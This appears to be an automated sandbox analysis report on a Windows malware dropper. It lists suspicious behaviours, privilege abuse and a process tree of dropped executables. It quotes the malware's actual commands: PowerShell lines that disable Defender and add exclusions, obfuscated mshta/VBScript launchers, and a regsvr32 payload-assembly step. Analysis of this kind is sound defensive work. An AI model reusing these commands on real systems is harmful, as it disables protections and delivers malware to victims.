pid Process 1816 powershell.exe 1124 powershell.exe 2104 Mon17a0d8ec302e.exe 2104 Mon17a0d8ec302e.exe 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 2524 Mon17bbf11fdb575d.tmp 2524 Mon17bbf11fdb575d.tmp 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 2724 WerFault.exe 2724 WerFault.exe 2724 WerFault.exe 2724 WerFault.exe 2724 WerFault.exe 2724 WerFault.exe 2724 WerFault.exe 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 1284 Process not Found 2724 WerFault.exe 2056 WerFault.exe 3116 WerFault.exe 2232 search_hyperfs_206.exe -
Suspicious behavior: MapViewOfSection 40 IoCs
pid Process 2104 Mon17a0d8ec302e.exe 1140 rectthb 2172 rectthb 1140 rectthb 4016 rectthb 3248 rectthb 644 rectthb 3084 rectthb 2296 rectthb 2464 rectthb 1012 rectthb 1884 rectthb 3660 rectthb 4000 rectthb 3676 rectthb 4076 rectthb 3776 rectthb 1564 rectthb 2940 rectthb 3392 rectthb 3704 rectthb 3048 rectthb 1428 rectthb 3400 rectthb 3376 rectthb 980 rectthb 3428 rectthb 456 rectthb 2124 rectthb 280 rectthb 980 rectthb 2260 rectthb 2176 rectthb 3324 rectthb 3056 rectthb 2400 rectthb 3848 rectthb 3936 rectthb 3520 rectthb 3632 rectthb -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1876 5202903.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1996 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 1996 Mon17870faab0.exe Token: SeLockMemoryPrivilege 1996 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 1996 Mon17870faab0.exe Token: SeMachineAccountPrivilege 1996 Mon17870faab0.exe Token: SeTcbPrivilege 1996 Mon17870faab0.exe Token: SeSecurityPrivilege 1996 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 1996 Mon17870faab0.exe Token: SeLoadDriverPrivilege 1996 Mon17870faab0.exe Token: SeSystemProfilePrivilege 1996 Mon17870faab0.exe Token: SeSystemtimePrivilege 1996 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 1996 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 1996 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 1996 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 1996 Mon17870faab0.exe Token: SeBackupPrivilege 1996 Mon17870faab0.exe Token: SeRestorePrivilege 1996 Mon17870faab0.exe Token: SeShutdownPrivilege 1996 Mon17870faab0.exe Token: SeDebugPrivilege 1996 Mon17870faab0.exe Token: SeAuditPrivilege 1996 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 1996 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 1996 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 1996 Mon17870faab0.exe Token: SeUndockPrivilege 1996 Mon17870faab0.exe Token: SeSyncAgentPrivilege 1996 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 1996 Mon17870faab0.exe Token: SeManageVolumePrivilege 1996 Mon17870faab0.exe Token: SeImpersonatePrivilege 1996 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 1996 Mon17870faab0.exe Token: 31 1996 Mon17870faab0.exe Token: 32 1996 Mon17870faab0.exe Token: 33 1996 Mon17870faab0.exe Token: 34 1996 Mon17870faab0.exe Token: 35 1996 Mon17870faab0.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeDebugPrivilege 2088 Mon17332e41e6b.exe Token: SeDebugPrivilege 788 Mon178d8e5d06822.exe Token: SeDebugPrivilege 2724 WerFault.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2972 taskkill.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 2624 DownFlSetup110.exe Token: SeDebugPrivilege 908 taskkill.exe Token: SeDebugPrivilege 2640 explorer.exe Token: SeDebugPrivilege 2480 chrome2.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2280 chrome3.exe Token: SeDebugPrivilege 2700 984612.exe Token: SeDebugPrivilege 3068 874733.exe Token: SeDebugPrivilege 2740 taskkill.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 692 taskkill.exe Token: SeDebugPrivilege 2660 taskkill.exe Token: SeDebugPrivilege 2748 193969.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
pid Process 1284 Process not Found 1284 Process not Found 2524 Mon17bbf11fdb575d.tmp 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1416 wrote to memory of 1832 1416 setup_install.exe 31 PID 1416 wrote to memory of 1832 1416 setup_install.exe 31 PID 1416 wrote to memory of 1832 1416 setup_install.exe 31 PID 1416 wrote to memory of 1832 1416 setup_install.exe 31 PID 1416 wrote to memory of 1832 1416 setup_install.exe 31 PID 1416 wrote to memory of 1832 1416 setup_install.exe 31 PID 1416 wrote to memory of 1832 1416 setup_install.exe 31 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1832 wrote to memory of 1124 1832 cmd.exe 34 PID 1832 wrote to memory of 1124 1832 cmd.exe 34 PID 1832 wrote to memory of 1124 1832 cmd.exe 34 PID 1832 wrote to memory of 1124 1832 cmd.exe 34 PID 1832 wrote to memory of 1124 1832 cmd.exe 34 PID 1832 wrote to memory of 1124 1832 cmd.exe 34 PID 1832 wrote to memory of 1124 1832 cmd.exe 34 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1848 wrote to memory of 1816 1848 cmd.exe 35 PID 1848 wrote to memory of 1816 1848 cmd.exe 35 PID 1848 wrote to memory of 1816 1848 cmd.exe 35 PID 1848 wrote to memory of 1816 1848 cmd.exe 35 PID 1848 wrote to memory of 1816 1848 cmd.exe 35 PID 1848 wrote to memory of 1816 1848 cmd.exe 35 PID 1848 wrote to memory of 1816 1848 cmd.exe 35 PID 1416 wrote to memory of 2012 1416 setup_install.exe 37 PID 1416 wrote to memory of 2012 1416 setup_install.exe 37 PID 1416 wrote to memory of 2012 1416 setup_install.exe 37 PID 1416 wrote to memory of 2012 1416 setup_install.exe 37 PID 1416 wrote to memory of 2012 1416 setup_install.exe 37 PID 1416 wrote to memory of 2012 1416 setup_install.exe 37 PID 1416 wrote to memory of 2012 1416 setup_install.exe 37 PID 1416 wrote to memory of 1868 1416 setup_install.exe 36 PID 1416 wrote to memory of 1868 1416 setup_install.exe 36 PID 1416 wrote to memory of 1868 1416 setup_install.exe 36 PID 1416 wrote to memory of 1868 1416 setup_install.exe 36 PID 1416 wrote to memory of 1868 1416 setup_install.exe 36 PID 1416 wrote to memory of 1868 1416 setup_install.exe 36 PID 1416 wrote to memory of 1868 1416 setup_install.exe 36 PID 1416 wrote to memory of 1820 1416 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC064C826\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe4⤵
- Loads dropped DLL
PID:112 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17870faab0.exeMon17870faab0.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2128
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe4⤵
- Loads dropped DLL
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:960 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))6⤵PID:2556
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f7⤵PID:2416
-
C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt8⤵
- Executes dropped EXE
PID:1244 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))9⤵PID:2584
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f10⤵PID:2592
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )9⤵PID:3004
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN10⤵PID:2400
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"11⤵PID:2096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:2784
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /S YLIH.bIN11⤵
- Executes dropped EXE
PID:2948
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f8⤵
- Loads dropped DLL
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe4⤵
- Loads dropped DLL
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon178e7a516181.exeMon178e7a516181.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1088 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 8046⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone4⤵
- Loads dropped DLL
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:600 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon17bffc2992eb3d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bffc2992eb3d.exe" & exit6⤵PID:2936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon17bffc2992eb3d.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe4⤵PID:764
-
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon173a360b525.exeMon173a360b525.exe5⤵
- Executes dropped EXE
PID:2592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1159525110.exe"6⤵PID:3184
-
C:\Users\Admin\AppData\Local\Temp\1159525110.exe"C:\Users\Admin\AppData\Local\Temp\1159525110.exe"7⤵PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6570899418.exe"6⤵PID:4032
-
C:\Users\Admin\AppData\Local\Temp\6570899418.exe"C:\Users\Admin\AppData\Local\Temp\6570899418.exe"7⤵
- Executes dropped EXE
PID:4068
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon173a360b525.exe" & exit6⤵PID:3772
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon173a360b525.exe" /f7⤵
- Kills process with taskkill
PID:3992
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe4⤵
- Loads dropped DLL
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:760 -
C:\Users\Admin\AppData\Local\Temp\is-65H0Q.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-65H0Q.tmp\Mon17bbf11fdb575d.tmp" /SL5="$10172,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe" /SILENT7⤵PID:2388
-
C:\Users\Admin\AppData\Local\Temp\is-VGP8N.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-VGP8N.tmp\Mon17bbf11fdb575d.tmp" /SL5="$20186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\is-KNOUG.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-KNOUG.tmp\postback.exe" ss19⤵
- Executes dropped EXE
PID:3000
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe4⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe5⤵PID:1928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 14566⤵
- Program crash
PID:2692
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe4⤵
- Loads dropped DLL
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe5⤵
- Executes dropped EXE
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17afe24e0084db3.exe" -u6⤵
- Executes dropped EXE
PID:2812
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe4⤵PID:1084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe4⤵PID:1072
-
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exe6⤵
- Executes dropped EXE
PID:2792
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2828
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe4⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon178d8e5d06822.exeMon178d8e5d06822.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:788 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Users\Admin\AppData\Roaming\193969.exe"C:\Users\Admin\AppData\Roaming\193969.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Users\Admin\AppData\Roaming\6902674.exe"C:\Users\Admin\AppData\Roaming\6902674.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2420
-
-
C:\Users\Admin\AppData\Roaming\7979066.exe"C:\Users\Admin\AppData\Roaming\7979066.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1480
-
-
C:\Users\Admin\AppData\Roaming\311589.exe"C:\Users\Admin\AppData\Roaming\311589.exe"8⤵
- Executes dropped EXE
PID:2240 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\311589.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\311589.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )9⤵
- Executes dropped EXE
PID:2816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\311589.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\311589.exe") do taskkill /im "%~nxT" /f10⤵PID:2892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "311589.exe" /f11⤵
- Kills process with taskkill
PID:1108
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5202903.exe"C:\Users\Admin\AppData\Roaming\5202903.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1876
-
-
C:\Users\Admin\AppData\Roaming\103796.exe"C:\Users\Admin\AppData\Roaming\103796.exe"8⤵
- Executes dropped EXE
PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵
- Executes dropped EXE
PID:292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 292 -s 14128⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:3116
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:2232 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:2504
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
PID:1928 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
PID:2332 -
